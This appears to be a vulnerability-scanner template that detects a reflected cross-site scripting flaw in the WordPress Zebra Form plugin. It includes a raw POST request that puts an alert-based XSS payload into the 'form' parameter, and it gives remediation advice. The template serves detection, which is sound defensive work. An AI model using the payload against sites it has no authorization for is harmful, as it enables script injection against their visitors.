id: wordpress-zebra-form-xss
info:
  name: Wordpress Zebra Form - Cross-Site Scripting
  author:
  - l0ne1y
  description: |-
    WordPress Plugin Zebra Form has cross-site scripting vulnerability
    WordPress is a blogging platform developed by the WordPress Foundation using the PHP language. The platform supports setting up personal blog websites on PHP and MySQL servers. Wordfence plugin is a malware scanning and firewall plugin used in it.

    WordPress plugin Zebra Form has a cross-site scripting vulnerability, which results from the lack of correct validation of client data in the WEB application. An attacker could exploit this vulnerability to execute client-side code.
  severity: medium
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: http://wordpress.org/extend/plugins/

    Temporary fix:
    1. Filter the input (and URL parameters), encode the output, and combine the whitelist and blacklist. That is to say, filter all submitted content, filter the parameters in the URL, and filter out relevant content that will cause the script to be executed; and then HTML-encode the content dynamically output to the page so that the script cannot be executed in the browser. Although input filtering can be bypassed, a large number of XSS attacks will still be intercepted; finally, characters are whitelisted or blacklisted.
requests:
- matchers:
  - type: word
    part: body
    words:
    - </script><img src onerror=alert(/XSS-form/)>
  - type: status
    status:
    - 200
  - type: word
    part: header
    words:
    - text/html
  matchers-condition: and
  raw:
  - |
    POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1
    Host: {{Hostname}}
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074
    Origin: null

    -----------------------------77916619616724262872902741074
    Content-Disposition: form-data; name="upload"; filename="{{randstr}}.txt"
    Content-Type: text/plain
    Test
    -----------------------------77916619616724262872902741074--
